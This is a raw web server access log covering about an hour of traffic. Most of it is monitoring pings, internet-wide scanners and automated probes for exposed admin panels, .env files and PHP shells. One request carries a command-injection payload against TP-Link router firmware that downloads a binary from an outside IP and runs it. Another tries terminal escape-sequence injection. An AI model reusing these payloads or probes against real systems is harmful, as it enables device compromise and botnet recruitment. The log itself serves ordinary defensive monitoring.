68.183.219.99 - - [01/Aug/2024:08:01:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.67.238 - - [01/Aug/2024:08:01:21 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
164.92.135.197 - - [01/Aug/2024:08:01:21 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
64.226.67.222 - - [01/Aug/2024:08:01:21 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
188.166.166.125 - - [01/Aug/2024:08:01:21 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
164.92.135.197 - - [01/Aug/2024:08:01:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.226.67.222 - - [01/Aug/2024:08:01:21 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
164.92.135.197 - - [01/Aug/2024:08:01:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
52.76.71.100 - - [01/Aug/2024:08:01:22 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
167.94.146.55 - - [01/Aug/2024:08:01:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.55 - - [01/Aug/2024:08:01:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.55 - - [01/Aug/2024:08:01:23 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
91.238.181.71 - - [01/Aug/2024:08:01:35 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:01:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.122.75.39 - - [01/Aug/2024:08:01:49 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:02:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:03:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:04:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.33.96.124 - - [01/Aug/2024:08:05:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:05:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:06:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.42.187 - - [01/Aug/2024:08:06:53 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F45.66.231.148%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.43 - - [01/Aug/2024:08:07:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:07:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
84.33.96.124 - - [01/Aug/2024:08:08:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:08:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:09:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.156.128.47 - - [01/Aug/2024:08:10:45 +0200] "GET /geoserver/web HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:08:10:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:11:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:08:12:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:12:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:08:13:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [01/Aug/2024:08:13:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:13:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:08:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:14:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:15:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.52 - - [01/Aug/2024:08:16:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.52 - - [01/Aug/2024:08:16:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.52 - - [01/Aug/2024:08:16:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.52 - - [01/Aug/2024:08:16:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:16:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:17:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.76.71.100 - - [01/Aug/2024:08:17:54 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Aug/2024:08:18:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.223.85.60 - - [01/Aug/2024:08:19:00 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0"
92.223.85.60 - - [01/Aug/2024:08:19:08 +0200] "GET /public/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0"
92.223.85.60 - - [01/Aug/2024:08:19:19 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0"
212.91.246.72 - - [01/Aug/2024:08:19:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:20:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:20:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:21:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.169.175.13 - - [01/Aug/2024:08:22:36 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:22:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:23:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:23:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:24:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:25:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:26:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:27:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:27:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:28:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:29:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:08:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
141.98.11.77 - - [01/Aug/2024:08:30:51 +0200] "CONNECT www.cloudflare.com:443 HTTP/1.1" 405 348 "-" "Go-http-client/1.1"
185.224.128.43 - - [01/Aug/2024:08:31:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:31:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.159.66.206 - - [01/Aug/2024:08:32:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Aug/2024:08:32:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.169.175.13 - - [01/Aug/2024:08:33:11 +0200] "\x03" 501 316 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:33:16 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:33:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
165.154.41.97 - - [01/Aug/2024:08:34:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.29.0"
165.154.41.97 - - [01/Aug/2024:08:34:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.154.41.97 - - [01/Aug/2024:08:34:13 +0200] "t3 12.1.2" 400 329 "-" "-"
149.50.103.48 - - [01/Aug/2024:08:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:08:35:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:35:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:36:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:37:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [01/Aug/2024:08:38:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:38:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:39:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:40:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:41:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:42:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:08:43:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.43 - - [01/Aug/2024:08:43:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Aug/2024:08:43:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:44:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:45:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Aug/2024:08:46:30 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Aug/2024:08:47:03 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:47:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.174.93.12 - - [01/Aug/2024:08:48:38 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:48:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:49:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:50:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
149.50.103.48 - - [01/Aug/2024:08:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:51:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.91.149.88 - - [01/Aug/2024:08:51:59 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
65.49.20.66 - - [01/Aug/2024:08:52:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
184.105.247.195 - - [01/Aug/2024:08:52:33 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:52:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:53:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:54:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.148.46 - - [01/Aug/2024:08:55:24 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:08:55:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.169.175.13 - - [01/Aug/2024:08:56:20 +0200] "\x03" 501 316 "-" "-"
194.169.175.13 - - [01/Aug/2024:08:56:26 +0200] "\x03" 501 316 "-" "-"
125.27.211.46 - - [01/Aug/2024:08:56:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:08:56:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:57:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:08:59:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.68.148.46 - - [01/Aug/2024:09:00:07 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.148.46 - - [01/Aug/2024:09:00:14 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.148.46 - - [01/Aug/2024:09:00:14 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.148.46 - - [01/Aug/2024:09:00:14 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.148.46 - - [01/Aug/2024:09:00:15 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
138.68.148.46 - - [01/Aug/2024:09:00:24 +0200] "\x16\x03\x01\x01\xfc\x01" 501 321 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:00:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.159.103.14 - - [01/Aug/2024:09:01:28 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.103.14 - - [01/Aug/2024:09:01:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Aug/2024:09:01:32 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Aug/2024:09:01:33 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Aug/2024:09:01:33 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
51.159.103.14 - - [01/Aug/2024:09:01:33 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.3"
149.50.103.48 - - [01/Aug/2024:09:01:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:01:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [01/Aug/2024:09:02:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:02:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:03:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
208.100.26.230 - - [01/Aug/2024:09:04:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
104.131.177.70 - - [01/Aug/2024:09:04:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.131.177.70 - - [01/Aug/2024:09:04:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.131.177.70 - - [01/Aug/2024:09:04:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.131.177.70 - - [01/Aug/2024:09:04:48 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
104.131.177.70 - - [01/Aug/2024:09:04:48 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
104.131.177.70 - - [01/Aug/2024:09:04:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
104.131.177.70 - - [01/Aug/2024:09:04:49 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.131.177.70 - - [01/Aug/2024:09:04:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.131.177.70 - - [01/Aug/2024:09:04:49 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.131.177.70 - - [01/Aug/2024:09:04:49 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:09:04:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
104.131.177.70 - - [01/Aug/2024:09:04:50 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [01/Aug/2024:09:05:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
208.100.26.230 - - [01/Aug/2024:09:06:19 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.1667.0 Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:06:19 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.1667.0 Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:06:19 +0200] "GET /nmaplowercheck1722495528 HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.1667.0 Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:06:19 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.1667.0 Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:06:19 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.1667.0 Safari/537.36"
208.100.26.230 - - [01/Aug/2024:09:06:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
208.100.26.230 - - [01/Aug/2024:09:06:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
138.91.149.88 - - [01/Aug/2024:09:06:48 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
138.91.149.88 - - [01/Aug/2024:09:06:52 +0200] "GET echo -e \"GET h://[f] HTTP/1.1" 400 329 "-" "-"
20.66.36.128 - - [01/Aug/2024:09:07:38 +0200] "GET /%1b%5d%32%3b%6f%77%6e%65%64%07%0a necho -en \"GET /\x1b]2;owned?\x07" 404 312 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:07:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
208.100.26.230 - - [01/Aug/2024:09:08:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [01/Aug/2024:09:08:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Aug/2024:09:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.254.29.124 - - [01/Aug/2024:09:10:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
